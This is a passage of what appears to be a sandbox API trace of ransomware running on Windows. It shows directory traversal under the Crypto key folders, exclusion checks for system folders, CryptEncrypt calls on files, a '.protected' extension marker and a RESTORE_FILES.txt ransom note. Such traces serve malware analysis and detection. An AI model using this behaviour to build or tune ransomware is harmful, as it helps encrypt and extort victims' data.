dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.124] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.124] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\.." (normalized: "c:\\users\\all users\\microsoft\\crypto"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.124] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.124] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.124] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.124] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.124] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.124] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.124] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\RESTORE_FILES.txt") returned 62 [0093.124] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.124] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.124] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.124] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.125] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\RESTORE_FILES.txt") returned 62 [0093.125] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All 
Users\\Microsoft\\Crypto\\Keys\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\crypto\\keys\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.125] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.125] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.125] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.125] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.125] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.126] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.126] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RESTORE_FILES.txt") returned 57 [0093.126] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.126] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.126] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.126] lstrcmpiW (lpString1="RSA", lpString2="Windows") returned -1 [0093.126] lstrcmpiW (lpString1="RSA", lpString2="Program Files") returned 1 [0093.126] lstrcmpiW (lpString1="RSA", lpString2="Program Files (x86)") returned 1 [0093.126] lstrcmpiW (lpString1="RSA", lpString2="$Recycle.bin") returned 1 [0093.126] lstrcmpiW (lpString1="RSA", lpString2="System Volume Information") returned -1 [0093.126] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA") returned 43 [0093.126] lstrcmpW (lpString1="RSA", lpString2=".") returned 1 [0093.126] lstrcmpW 
(lpString1="RSA", lpString2="..") returned 1 [0093.126] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\*") returned 45 [0093.126] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.126] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.126] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.126] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.126] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.126] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.126] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\.") returned 45 [0093.126] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.126] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.126] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.127] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.127] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.127] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.127] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.127] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\..") returned 46 [0093.127] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.127] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.127] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.127] lstrcmpiW (lpString1="MachineKeys", lpString2="Windows") returned -1 
[0093.127] lstrcmpiW (lpString1="MachineKeys", lpString2="Program Files") returned -1 [0093.127] lstrcmpiW (lpString1="MachineKeys", lpString2="Program Files (x86)") returned -1 [0093.127] lstrcmpiW (lpString1="MachineKeys", lpString2="$Recycle.bin") returned 1 [0093.127] lstrcmpiW (lpString1="MachineKeys", lpString2="System Volume Information") returned -1 [0093.127] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys") returned 55 [0093.127] lstrcmpW (lpString1="MachineKeys", lpString2=".") returned 1 [0093.127] lstrcmpW (lpString1="MachineKeys", lpString2="..") returned 1 [0093.127] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\*") returned 57 [0093.127] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.127] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.127] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.127] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.127] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.127] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.127] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\.") returned 57 [0093.127] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.127] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.128] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.128] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.128] lstrcmpiW (lpString1="..", lpString2="Program Files 
(x86)") returned -1 [0093.128] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.128] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.128] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\..") returned 58 [0093.128] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.128] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.128] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.128] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.128] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.128] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.128] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.128] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.128] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\RESTORE_FILES.txt") returned 73 [0093.128] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.128] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.128] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.128] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.128] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\RESTORE_FILES.txt") returned 73 [0093.128] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\RESTORE_FILES.txt" (normalized: "c:\\users\\all 
users\\microsoft\\crypto\\rsa\\machinekeys\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.128] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.128] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.128] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.128] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.128] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.128] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.128] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\RESTORE_FILES.txt") returned 61 [0093.128] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.129] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.129] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.129] lstrcmpiW (lpString1="S-1-5-18", lpString2="Windows") returned -1 [0093.129] lstrcmpiW (lpString1="S-1-5-18", lpString2="Program Files") returned 1 [0093.129] lstrcmpiW (lpString1="S-1-5-18", lpString2="Program Files (x86)") returned 1 [0093.129] lstrcmpiW (lpString1="S-1-5-18", lpString2="$Recycle.bin") returned 1 [0093.129] lstrcmpiW (lpString1="S-1-5-18", lpString2="System Volume Information") returned -1 [0093.129] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18") returned 52 [0093.129] lstrcmpW (lpString1="S-1-5-18", lpString2=".") returned 1 [0093.129] lstrcmpW (lpString1="S-1-5-18", 
lpString2="..") returned 1 [0093.129] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*") returned 54 [0093.129] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.129] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.129] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.129] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.129] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.129] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.129] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\.") returned 54 [0093.129] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.129] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0093.129] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0093.129] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.129] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.129] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\." 
(normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.129] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.130] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.130] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.130] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.130] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.130] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.130] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\..") returned 55 [0093.130] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.130] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.130] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0093.130] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0093.130] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.130] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.130] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\.." 
(normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.130] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.130] lstrcmpiW (lpString1="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.protected", lpString2="Windows") returned -1 [0093.130] lstrcmpiW (lpString1="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.protected", lpString2="Program Files") returned -1 [0093.130] lstrcmpiW (lpString1="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.protected", lpString2="Program Files (x86)") returned -1 [0093.130] lstrcmpiW (lpString1="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.protected", lpString2="$Recycle.bin") returned 1 [0093.130] lstrcmpiW (lpString1="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.protected", lpString2="System Volume Information") returned -1 [0093.130] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.protected") returned 132 [0093.130] StrStrIW (lpFirst="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.protected", lpSrch=".protected") returned=".protected" [0093.130] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.130] lstrcmpiW (lpString1="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.protected", lpString2="Windows") returned -1 [0093.130] lstrcmpiW (lpString1="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.protected", lpString2="Program Files") returned -1 [0093.130] lstrcmpiW 
(lpString1="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.protected", lpString2="Program Files (x86)") returned -1 [0093.130] lstrcmpiW (lpString1="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.protected", lpString2="$Recycle.bin") returned 1 [0093.130] lstrcmpiW (lpString1="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.protected", lpString2="System Volume Information") returned -1 [0093.130] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.protected") returned 132 [0093.130] StrStrIW (lpFirst="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.protected", lpSrch=".protected") returned=".protected" [0093.130] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.130] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.130] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.130] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.130] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.131] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.131] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\RESTORE_FILES.txt") returned 70 [0093.131] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.131] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.131] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.131] FindClose (in: hFindFile=0x47ba50 | out: 
hFindFile=0x47ba50) returned 1 [0093.131] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\RESTORE_FILES.txt") returned 70 [0093.131] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.131] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.131] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.131] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\RESTORE_FILES.txt") returned 61 [0093.131] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.132] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.132] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.132] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RESTORE_FILES.txt") returned 57 [0093.132] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\crypto\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.133] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.133] lstrcmpiW (lpString1="Device Stage", lpString2="Windows") returned -1 [0093.133] lstrcmpiW (lpString1="Device Stage", lpString2="Program Files") returned -1 [0093.133] lstrcmpiW (lpString1="Device Stage", lpString2="Program Files (x86)") returned -1 [0093.133] lstrcmpiW (lpString1="Device Stage", lpString2="$Recycle.bin") returned 1 [0093.133] lstrcmpiW (lpString1="Device Stage", lpString2="System Volume Information") returned -1 [0093.133] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage") returned 45 [0093.133] lstrcmpW (lpString1="Device Stage", lpString2=".") returned 1 [0093.133] lstrcmpW (lpString1="Device Stage", lpString2="..") returned 1 [0093.133] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\*") returned 47 [0093.133] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.133] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.133] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.133] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.133] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.133] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.133] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\.") returned 47 [0093.133] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.133] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) 
returned 1 [0093.133] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.133] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.134] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.134] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.134] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.134] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\..") returned 48 [0093.134] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.134] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.134] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.134] lstrcmpiW (lpString1="Device", lpString2="Windows") returned -1 [0093.134] lstrcmpiW (lpString1="Device", lpString2="Program Files") returned -1 [0093.134] lstrcmpiW (lpString1="Device", lpString2="Program Files (x86)") returned -1 [0093.134] lstrcmpiW (lpString1="Device", lpString2="$Recycle.bin") returned 1 [0093.134] lstrcmpiW (lpString1="Device", lpString2="System Volume Information") returned -1 [0093.134] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device") returned 52 [0093.134] lstrcmpW (lpString1="Device", lpString2=".") returned 1 [0093.134] lstrcmpW (lpString1="Device", lpString2="..") returned 1 [0093.134] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\*") returned 54 [0093.134] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.135] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.135] lstrcmpiW (lpString1=".", 
lpString2="Program Files") returned -1 [0093.135] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.135] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.135] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.135] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\.") returned 54 [0093.135] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.135] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.135] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.135] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.135] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.135] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.135] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.135] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\..") returned 55 [0093.135] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.135] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.135] 